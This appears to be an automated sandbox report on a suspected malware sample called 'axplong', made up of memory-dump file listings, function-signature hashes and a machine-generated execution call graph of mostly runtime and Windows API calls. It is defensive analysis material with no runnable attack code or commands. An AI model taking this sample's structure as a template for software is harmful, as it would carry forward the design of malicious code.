                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsrchr
                                                                                                                                                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                          • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                          • Opcode ID: 0344d44bc46acc1e0605f4cb7f2d845813aecce1c854fc262082570898dbb0b7
                                                                                                                                                                                                                                          • Instruction ID: 987831d70d1943603f05a49adf4dce7d64a6d3077adfb163a00004e4380d5ace
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0344d44bc46acc1e0605f4cb7f2d845813aecce1c854fc262082570898dbb0b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B901C837B0C61E3556146499DC02777DB9C9FD2BB8B19002AFA44F72C2EE94DC9183A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                                                                                          • Instruction ID: f3b51db0dcd3c6a8bf3a719428d0660384d978bf9826f5eddf89cf292816bdd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB149B190024D9FDB15CF28CA827BEBBE5EF55340F14C56AE695EB341D6389D01CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 7409cbeb684a9fe5d120ac01df16d97b7a332f848ac56f117326aa2e5894002c
                                                                                                                                                                                                                                          • Instruction ID: b4580889ce6952db03851973d14b522d36f7ff3732d13a2ca0c99b5e687acdd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7409cbeb684a9fe5d120ac01df16d97b7a332f848ac56f117326aa2e5894002c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F212CB5A4011AAFDF00EFA4DD81ABEB7B8EF48710F518066F901A7351DB74AD01DBA0

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0.9%
                                                                                                                                                                                                                                          Total number of Nodes:1964
                                                                                                                                                                                                                                          Total number of Limit Nodes:21
                                                                                                                                                                                                                                          execution_graph 22163 aa10a0 22166 aab313 22163->22166 22169 aab2e6 22166->22169 22170 aab2fc 22169->22170 22171 aab2f5 22169->22171 22178 ab86fc 22170->22178 22175 ab867f 22171->22175 22174 aa10a5 22176 ab86fc 46 API calls 22175->22176 22177 ab8691 22176->22177 22177->22174 22181 ab8448 22178->22181 22182 ab8454 ___scrt_is_nonwritable_in_current_image 22181->22182 22189 ab3011 EnterCriticalSection 22182->22189 22184 ab8462 22190 ab84a3 22184->22190 22186 ab846f 22200 ab8497 22186->22200 22189->22184 22191 ab84be 22190->22191 22192 ab8531 std::_Locinfo::_Locinfo_dtor 22190->22192 22191->22192 22199 ab8511 22191->22199 22203 ac2e79 22191->22203 22192->22186 22194 ac2e79 46 API calls 22195 ab8527 22194->22195 22197 ab8a3f ___free_lconv_mon 14 API calls 22195->22197 22196 ab8507 22198 ab8a3f ___free_lconv_mon 14 API calls 22196->22198 22197->22192 22198->22199 22199->22192 22199->22194 22231 ab3059 LeaveCriticalSection 22200->22231 22202 ab8480 22202->22174 22204 ac2e86 22203->22204 22205 ac2ea1 22203->22205 22204->22205 22206 ac2e92 22204->22206 22209 ac2eb0 22205->22209 22212 ac61bf 22205->22212 22207 ab2fbd __strnicoll 14 API calls 22206->22207 22211 ac2e97 codecvt 22207->22211 22219 abefdd 22209->22219 22211->22196 22213 ac61df HeapSize 22212->22213 22214 ac61ca 22212->22214 22213->22209 22215 ab2fbd __strnicoll 14 API calls 22214->22215 22216 ac61cf 22215->22216 22217 ab2ebf __strnicoll 43 API calls 22216->22217 22218 ac61da 22217->22218 22218->22209 22220 abefea 22219->22220 22221 abeff5 22219->22221 22222 ab9c27 __fread_nolock 15 API calls 22220->22222 22223 abeffd 22221->22223 22229 abf006 __Getctype 22221->22229 22224 abeff2 22222->22224 22225 ab8a3f ___free_lconv_mon 14 API calls 22223->22225 22224->22211 22225->22224 22226 abf00b 22228 ab2fbd __strnicoll 14 API calls 22226->22228 22227 abf030 HeapReAlloc 22227->22224 22227->22229 22228->22224 22229->22226 22229->22227 22230 ab8364 std::ios_base::_Init 2 API calls 22229->22230 22230->22229 22231->22202 19707 ac98b0 19720 aa76d0 19707->19720 19709 ac98f0 19736 aab076 19709->19736 19718 ac996c std::ios_base::_Ios_base_dtor 19792 aab063 19718->19792 19719 ac99c7 19721 aa7703 19720->19721 19722 aa76e0 19720->19722 19725 aa7714 19721->19725 19727 aab076 std::ios_base::_Init 3 API calls 19721->19727 19723 aa771a 19722->19723 19724 aa76e7 19722->19724 19799 aa1370 19723->19799 19726 aab076 std::ios_base::_Init 3 API calls 19724->19726 19725->19709 19729 aa76ed 19726->19729 19730 aa770d 19727->19730 19731 aa76f6 19729->19731 19805 ab2ecf 19729->19805 19730->19709 19731->19709 19737 aab07b ___std_exception_copy 19736->19737 19738 aab095 19737->19738 19739 ab8364 std::ios_base::_Init 2 API calls 19737->19739 19740 aab097 std::ios_base::_Init 19737->19740 19743 ac93c0 19738->19743 19739->19737 19741 aabca0 Concurrency::cancel_current_task RaiseException 19740->19741 19742 aabbc3 19741->19742 19744 ac9609 19743->19744 19749 ac93ea std::ios_base::_Ios_base_dtor 19743->19749 19745 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19744->19745 19746 ac961a VirtualAlloc GetUpdateRgn 19745->19746 19753 ac9670 19746->19753 19747 aa6280 44 API calls 19747->19749 19748 ab2b61 46 API calls 19748->19749 19749->19744 19749->19747 19749->19748 19750 ac9620 19749->19750 19751 ab2ecf std::ios_base::_Init 43 API calls 19750->19751 19752 ac9625 19751->19752 19754 aab076 std::ios_base::_Init 3 API calls 19753->19754 19755 ac9689 19754->19755 19757 ac9703 std::ios_base::_Ios_base_dtor 19755->19757 20087 aa74b0 19755->20087 19758 ac987d std::ios_base::_Ios_base_dtor 19757->19758 19760 ac98a4 19757->19760 19759 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19758->19759 19761 ac9896 19759->19761 19762 ab2ecf std::ios_base::_Init 43 API calls 19760->19762 19764 ac9000 19761->19764 19763 ac98a9 19762->19763 19765 aab076 std::ios_base::_Init 3 API calls 19764->19765 19767 ac902b 19765->19767 19777 ac908b std::ios_base::_Ios_base_dtor 19767->19777 20163 aa5030 19767->20163 20171 aa5240 19767->20171 19769 ac9102 OffsetRect 19769->19777 19770 aa5240 76 API calls 19770->19777 19772 aa2300 76 API calls 19772->19777 19776 aa2460 76 API calls 19776->19777 19777->19769 19777->19770 19777->19772 19777->19776 19778 ac93af 19777->19778 19781 ac937a std::ios_base::_Ios_base_dtor 19777->19781 20179 ab2b61 19777->20179 20185 aa6510 19777->20185 20212 aa6dc0 19777->20212 20219 aa4a80 19777->20219 19779 ab2ecf std::ios_base::_Init 43 API calls 19778->19779 19788 ac93b4 std::ios_base::_Ios_base_dtor 19779->19788 19780 ac9609 19782 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19780->19782 19784 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19781->19784 19783 ac961a 19782->19783 19783->19718 19785 ac93ab 19784->19785 19785->19718 19786 aa6280 44 API calls 19786->19788 19787 ab2b61 46 API calls 19787->19788 19788->19780 19788->19786 19788->19787 19789 ac9620 19788->19789 19790 ab2ecf std::ios_base::_Init 43 API calls 19789->19790 19791 ac9625 19790->19791 19793 aab06b 19792->19793 19794 aab06c IsProcessorFeaturePresent 19792->19794 19793->19719 19796 aab9e2 19794->19796 20846 aab9a5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19796->20846 19798 aabac5 19798->19719 19800 aa137b std::ios_base::_Init 19799->19800 19810 aabca0 19800->19810 19802 aa138a 19813 aabbfb 19802->19813 19806 ab2e0b __strnicoll 43 API calls 19805->19806 19807 ab2ede 19806->19807 19808 ab2eec __Getctype 11 API calls 19807->19808 19809 ab2eeb 19808->19809 19811 aabce7 RaiseException 19810->19811 19812 aabcba 19810->19812 19811->19802 19812->19811 19814 aabc08 ___std_exception_copy 19813->19814 19818 aa13b1 19813->19818 19815 aabc35 19814->19815 19814->19818 19819 ab88cb 19814->19819 19828 ab225f 19815->19828 19818->19729 19820 ab88d9 19819->19820 19822 ab88e7 19819->19822 19820->19822 19826 ab88ff 19820->19826 19831 ab2fbd 19822->19831 19823 ab88ef 19834 ab2ebf 19823->19834 19825 ab88f9 19825->19815 19826->19825 19827 ab2fbd __strnicoll 14 API calls 19826->19827 19827->19823 19829 ab8a3f ___free_lconv_mon 14 API calls 19828->19829 19830 ab2277 19829->19830 19830->19818 19837 ab9a18 GetLastError 19831->19837 19833 ab2fc2 19833->19823 19972 ab2e0b 19834->19972 19838 ab9a2e 19837->19838 19842 ab9a34 19837->19842 19860 ab8f6b 19838->19860 19858 ab9a38 SetLastError 19842->19858 19865 ab8faa 19842->19865 19846 ab9a7e 19849 ab8faa __Getctype 6 API calls 19846->19849 19847 ab9a6d 19848 ab8faa __Getctype 6 API calls 19847->19848 19850 ab9a7b 19848->19850 19851 ab9a8a 19849->19851 19877 ab8a3f 19850->19877 19852 ab9a8e 19851->19852 19853 ab9aa5 19851->19853 19855 ab8faa __Getctype 6 API calls 19852->19855 19883 ab96f5 19853->19883 19855->19850 19858->19833 19859 ab8a3f ___free_lconv_mon 12 API calls 19859->19858 19888 ab8d1a 19860->19888 19863 ab8fa2 TlsGetValue 19864 ab8f90 19864->19842 19866 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 19865->19866 19867 ab8fc6 19866->19867 19868 ab8fcf 19867->19868 19869 ab8fe4 TlsSetValue 19867->19869 19868->19858 19870 ab89e2 19868->19870 19875 ab89ef __Getctype 19870->19875 19871 ab8a2f 19873 ab2fbd __strnicoll 13 API calls 19871->19873 19872 ab8a1a RtlAllocateHeap 19874 ab8a2d 19872->19874 19872->19875 19873->19874 19874->19846 19874->19847 19875->19871 19875->19872 19903 ab8364 19875->19903 19878 ab8a4a HeapFree 19877->19878 19879 ab8a74 19877->19879 19878->19879 19880 ab8a5f GetLastError 19878->19880 19879->19858 19881 ab8a6c __dosmaperr 19880->19881 19882 ab2fbd __strnicoll 12 API calls 19881->19882 19882->19879 19916 ab9589 19883->19916 19889 ab8d48 19888->19889 19894 ab8d44 19888->19894 19889->19894 19895 ab8c4f 19889->19895 19892 ab8d62 GetProcAddress 19893 ab8d72 std::_Locinfo::_Locinfo_dtor 19892->19893 19892->19894 19893->19894 19894->19863 19894->19864 19896 ab8c60 ___vcrt_FlsGetValue 19895->19896 19897 ab8cf6 19896->19897 19898 ab8c7e LoadLibraryExW 19896->19898 19902 ab8ccc LoadLibraryExW 19896->19902 19897->19892 19897->19894 19899 ab8c99 GetLastError 19898->19899 19900 ab8cfd 19898->19900 19899->19896 19900->19897 19901 ab8d0f FreeLibrary 19900->19901 19901->19897 19902->19896 19902->19900 19906 ab8391 19903->19906 19907 ab839d ___scrt_is_nonwritable_in_current_image 19906->19907 19912 ab3011 EnterCriticalSection 19907->19912 19909 ab83a8 19913 ab83e4 19909->19913 19912->19909 19914 ab3059 std::_Lockit::~_Lockit LeaveCriticalSection 19913->19914 19915 ab836f 19914->19915 19915->19875 19917 ab9595 ___scrt_is_nonwritable_in_current_image 19916->19917 19930 ab3011 EnterCriticalSection 19917->19930 19919 ab959f 19931 ab95cf 19919->19931 19922 ab969b 19923 ab96a7 ___scrt_is_nonwritable_in_current_image 19922->19923 19935 ab3011 EnterCriticalSection 19923->19935 19925 ab96b1 19936 ab987c 19925->19936 19927 ab96c9 19940 ab96e9 19927->19940 19930->19919 19934 ab3059 LeaveCriticalSection 19931->19934 19933 ab95bd 19933->19922 19934->19933 19935->19925 19937 ab98b2 __Getctype 19936->19937 19938 ab988b __Getctype 19936->19938 19937->19927 19938->19937 19943 ac1907 19938->19943 19971 ab3059 LeaveCriticalSection 19940->19971 19942 ab96d7 19942->19859 19944 ac1987 19943->19944 19946 ac191d 19943->19946 19947 ab8a3f ___free_lconv_mon 14 API calls 19944->19947 19970 ac19d5 19944->19970 19945 ac1a78 __Getctype 14 API calls 19954 ac19e3 19945->19954 19946->19944 19948 ac1950 19946->19948 19952 ab8a3f ___free_lconv_mon 14 API calls 19946->19952 19949 ac19a9 19947->19949 19958 ab8a3f ___free_lconv_mon 14 API calls 19948->19958 19969 ac1972 19948->19969 19950 ab8a3f ___free_lconv_mon 14 API calls 19949->19950 19953 ac19bc 19950->19953 19951 ab8a3f ___free_lconv_mon 14 API calls 19955 ac197c 19951->19955 19957 ac1945 19952->19957 19959 ab8a3f ___free_lconv_mon 14 API calls 19953->19959 19956 ac1a43 19954->19956 19962 ab8a3f 14 API calls ___free_lconv_mon 19954->19962 19960 ab8a3f ___free_lconv_mon 14 API calls 19955->19960 19961 ab8a3f ___free_lconv_mon 14 API calls 19956->19961 19963 ac0bbd ___free_lconv_mon 14 API calls 19957->19963 19964 ac1967 19958->19964 19965 ac19ca 19959->19965 19960->19944 19966 ac1a49 19961->19966 19962->19954 19963->19948 19967 ac1071 __Getctype 14 API calls 19964->19967 19968 ab8a3f ___free_lconv_mon 14 API calls 19965->19968 19966->19937 19967->19969 19968->19970 19969->19951 19970->19945 19971->19942 19973 ab2e1d _Fputc 19972->19973 19978 ab2e42 19973->19978 19975 ab2e35 19989 ab0740 19975->19989 19979 ab2e59 19978->19979 19980 ab2e52 19978->19980 19986 ab2e67 19979->19986 19999 ab2c9a 19979->19999 19995 ab0990 GetLastError 19980->19995 19983 ab2e8e 19983->19986 20002 ab2eec IsProcessorFeaturePresent 19983->20002 19985 ab2ebe 19987 ab2e0b __strnicoll 43 API calls 19985->19987 19986->19975 19988 ab2ecb 19987->19988 19988->19975 19990 ab074c 19989->19990 19991 ab0763 19990->19991 20034 ab09e0 19990->20034 19993 ab0776 19991->19993 19994 ab09e0 _Fputc 43 API calls 19991->19994 19993->19825 19994->19993 19996 ab09a9 19995->19996 20006 ab9ac9 19996->20006 20000 ab2cbe 19999->20000 20001 ab2ca5 GetLastError SetLastError 19999->20001 20000->19983 20001->19983 20003 ab2ef8 20002->20003 20028 ab2cc3 20003->20028 20007 ab9adc 20006->20007 20008 ab9ae2 20006->20008 20009 ab8f6b __Getctype 6 API calls 20007->20009 20010 ab8faa __Getctype 6 API calls 20008->20010 20027 ab09c5 SetLastError 20008->20027 20009->20008 20011 ab9afc 20010->20011 20012 ab89e2 __Getctype 14 API calls 20011->20012 20011->20027 20013 ab9b0c 20012->20013 20014 ab9b29 20013->20014 20015 ab9b14 20013->20015 20017 ab8faa __Getctype 6 API calls 20014->20017 20016 ab8faa __Getctype 6 API calls 20015->20016 20018 ab9b20 20016->20018 20019 ab9b35 20017->20019 20023 ab8a3f ___free_lconv_mon 14 API calls 20018->20023 20020 ab9b39 20019->20020 20021 ab9b48 20019->20021 20024 ab8faa __Getctype 6 API calls 20020->20024 20022 ab96f5 __Getctype 14 API calls 20021->20022 20025 ab9b53 20022->20025 20023->20027 20024->20018 20026 ab8a3f ___free_lconv_mon 14 API calls 20025->20026 20026->20027 20027->19979 20029 ab2cdf __purecall codecvt 20028->20029 20030 ab2d0b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20029->20030 20033 ab2ddc __purecall 20030->20033 20031 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20032 ab2dfa GetCurrentProcess TerminateProcess 20031->20032 20032->19985 20033->20031 20035 ab0a2f 20034->20035 20036 ab09ee GetLastError 20034->20036 20035->19991 20037 ab09fd 20036->20037 20038 ab9ac9 _Fputc 14 API calls 20037->20038 20039 ab0a1a SetLastError 20038->20039 20039->20035 20040 ab0a36 20039->20040 20043 ab3087 20040->20043 20054 abb8d0 20043->20054 20046 ab3097 20048 ab30c0 20046->20048 20049 ab30a1 IsProcessorFeaturePresent 20046->20049 20084 ab6b3f 20048->20084 20050 ab30ad 20049->20050 20052 ab2cc3 __purecall 8 API calls 20050->20052 20052->20048 20055 abb802 __purecall EnterCriticalSection LeaveCriticalSection 20054->20055 20056 ab308c 20055->20056 20056->20046 20057 abb915 20056->20057 20058 abb921 ___scrt_is_nonwritable_in_current_image 20057->20058 20059 ab9a18 __strnicoll 14 API calls 20058->20059 20063 abb94e __purecall 20058->20063 20064 abb948 __purecall 20058->20064 20059->20064 20060 abb995 20061 ab2fbd __strnicoll 14 API calls 20060->20061 20062 abb99a 20061->20062 20065 ab2ebf __strnicoll 43 API calls 20062->20065 20066 abb9c1 20063->20066 20067 ab3011 std::_Lockit::_Lockit EnterCriticalSection 20063->20067 20064->20060 20064->20063 20083 abb97f 20064->20083 20065->20083 20069 abba03 20066->20069 20070 abbaf4 20066->20070 20080 abba32 20066->20080 20067->20066 20068 abbaa1 __purecall LeaveCriticalSection 20071 abba78 20068->20071 20075 ab98c7 __Getctype 43 API calls 20069->20075 20069->20080 20072 abbaff 20070->20072 20073 ab3059 std::_Lockit::~_Lockit LeaveCriticalSection 20070->20073 20077 ab98c7 __Getctype 43 API calls 20071->20077 20081 abba87 20071->20081 20071->20083 20074 ab6b3f __purecall 23 API calls 20072->20074 20073->20072 20076 abbb07 20074->20076 20078 abba27 20075->20078 20077->20081 20079 ab98c7 __Getctype 43 API calls 20078->20079 20079->20080 20080->20068 20082 ab98c7 __Getctype 43 API calls 20081->20082 20081->20083 20082->20083 20083->20046 20085 ab6963 __purecall 23 API calls 20084->20085 20086 ab30ca 20085->20086 20088 aa7646 20087->20088 20091 aa74fd 20087->20091 20113 aa70a0 20088->20113 20090 ab2ecf std::ios_base::_Init 43 API calls 20092 aa7650 20090->20092 20093 aab076 std::ios_base::_Init 3 API calls 20091->20093 20147 aa4c10 20092->20147 20096 aa7557 codecvt 20093->20096 20095 aa765b 20097 aabca0 Concurrency::cancel_current_task RaiseException 20095->20097 20096->20090 20111 aa760b std::ios_base::_Ios_base_dtor 20096->20111 20099 aa7664 20097->20099 20098 aa76c3 20100 aa1370 std::_Throw_Cpp_error 44 API calls 20098->20100 20099->20098 20101 aa7689 20099->20101 20102 aa76ac 20099->20102 20104 aa7696 20100->20104 20101->20098 20105 aa7690 20101->20105 20103 aa76bd 20102->20103 20106 aab076 std::ios_base::_Init 3 API calls 20102->20106 20103->19755 20107 ab2ecf std::ios_base::_Init 43 API calls 20104->20107 20112 aa769f 20104->20112 20108 aab076 std::ios_base::_Init 3 API calls 20105->20108 20109 aa76b6 20106->20109 20110 aa76cd 20107->20110 20108->20104 20109->19755 20111->19755 20112->19755 20152 aa7be2 20113->20152 20148 aa4c37 std::ios_base::_Ios_base_dtor 20147->20148 20149 aa4c27 20147->20149 20148->20095 20149->20148 20150 ab2ecf std::ios_base::_Init 43 API calls 20149->20150 20151 aa4c4b 20150->20151 20157 aa7b05 20152->20157 20155 aabca0 Concurrency::cancel_current_task RaiseException 20156 aa7c01 20155->20156 20160 aa1280 20157->20160 20161 aabbfb ___std_exception_copy 43 API calls 20160->20161 20162 aa12ae 20161->20162 20162->20155 20164 aa5071 20163->20164 20227 aa3230 20164->20227 20167 aa51ff 20168 aa5212 20167->20168 20242 aa4b80 20167->20242 20168->19767 20169 aa50c6 20232 aa2230 20169->20232 20172 aa5265 20171->20172 20325 aa4e90 20172->20325 20175 aa526f 20364 aa6f30 20175->20364 20177 aa4a80 49 API calls 20178 aa52aa 20177->20178 20178->19767 20180 ab2b74 _Fputc 20179->20180 20717 ab227a 20180->20717 20182 ab2b8e 20183 ab0740 _Fputc 43 API calls 20182->20183 20184 ab2b9b 20183->20184 20184->19777 20186 aa7905 std::_Lockit::_Lockit 7 API calls 20185->20186 20187 aa6525 20186->20187 20188 aa7905 std::_Lockit::_Lockit 7 API calls 20187->20188 20194 aa6560 20187->20194 20189 aa653f 20188->20189 20192 aa795d std::_Lockit::~_Lockit 2 API calls 20189->20192 20190 aa6586 20191 aa795d std::_Lockit::~_Lockit 2 API calls 20190->20191 20193 aa658f 20191->20193 20192->20194 20193->19777 20194->20190 20195 aab076 std::ios_base::_Init 3 API calls 20194->20195 20196 aa65c7 20195->20196 20197 aa7905 std::_Lockit::_Lockit 7 API calls 20196->20197 20198 aa65f6 20197->20198 20199 aa6648 20198->20199 20200 aa66c4 20198->20200 20202 aa9135 std::_Locinfo::_Locinfo_ctor 70 API calls 20199->20202 20201 aa7c22 codecvt 44 API calls 20200->20201 20203 aa66ce 20201->20203 20204 aa6653 20202->20204 20205 aaa4b3 __Getctype 43 API calls 20204->20205 20206 aa666a 20205->20206 20828 aaa62a 20206->20828 20209 aa1a20 codecvt 70 API calls 20210 aa66a9 20209->20210 20838 aa9005 20210->20838 20213 aa3230 49 API calls 20212->20213 20214 aa6dfe 20213->20214 20215 aa2230 std::ios_base::_Init 49 API calls 20214->20215 20217 aa6e8b 20215->20217 20216 aa6e9e 20216->19777 20217->20216 20218 aa4b80 49 API calls 20217->20218 20218->20216 20220 aa4ac1 20219->20220 20225 aa4b4e 20219->20225 20221 aa3230 49 API calls 20220->20221 20222 aa4aca 20221->20222 20223 aa4b3d 20222->20223 20226 aa2230 std::ios_base::_Init 49 API calls 20222->20226 20224 aa4b80 49 API calls 20223->20224 20223->20225 20224->20225 20225->19777 20226->20223 20229 aa324c 20227->20229 20228 aa3260 20228->20169 20229->20228 20230 aa4a80 49 API calls 20229->20230 20231 aa327f 20230->20231 20231->20169 20233 aa224a 20232->20233 20233->20167 20234 aabca0 Concurrency::cancel_current_task RaiseException 20233->20234 20235 aa2262 std::ios_base::_Init 20233->20235 20234->20235 20246 aa2160 20235->20246 20237 aa2298 20238 aabca0 Concurrency::cancel_current_task RaiseException 20237->20238 20239 aa22a7 20238->20239 20240 aabbfb ___std_exception_copy 43 API calls 20239->20240 20241 aa22d2 20240->20241 20241->20167 20243 aa4be3 20242->20243 20244 aa4bbe 20242->20244 20243->20168 20244->20243 20322 aa3cd0 20244->20322 20247 aa21a8 20246->20247 20247->20247 20266 aa55e0 20247->20266 20249 aa21be 20274 aa14d0 20249->20274 20251 aa21cf 20252 aa21f7 std::ios_base::_Ios_base_dtor 20251->20252 20254 aa221c 20251->20254 20253 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20252->20253 20255 aa2216 20253->20255 20256 ab2ecf std::ios_base::_Init 43 API calls 20254->20256 20255->20237 20257 aa2221 20256->20257 20257->20237 20258 aabca0 Concurrency::cancel_current_task RaiseException 20257->20258 20259 aa2262 std::ios_base::_Init 20257->20259 20258->20259 20260 aa2160 std::ios_base::_Init 49 API calls 20259->20260 20261 aa2298 20260->20261 20262 aabca0 Concurrency::cancel_current_task RaiseException 20261->20262 20263 aa22a7 20262->20263 20264 aabbfb ___std_exception_copy 43 API calls 20263->20264 20265 aa22d2 20264->20265 20265->20237 20267 aa5669 20266->20267 20271 aa55f0 20266->20271 20298 aa13f0 20267->20298 20269 aa55f5 codecvt 20269->20249 20271->20269 20272 aa76d0 std::_Throw_Cpp_error 49 API calls 20271->20272 20273 aa5643 codecvt 20272->20273 20273->20249 20275 aa1515 20274->20275 20276 aa1757 20275->20276 20281 aa152a 20275->20281 20277 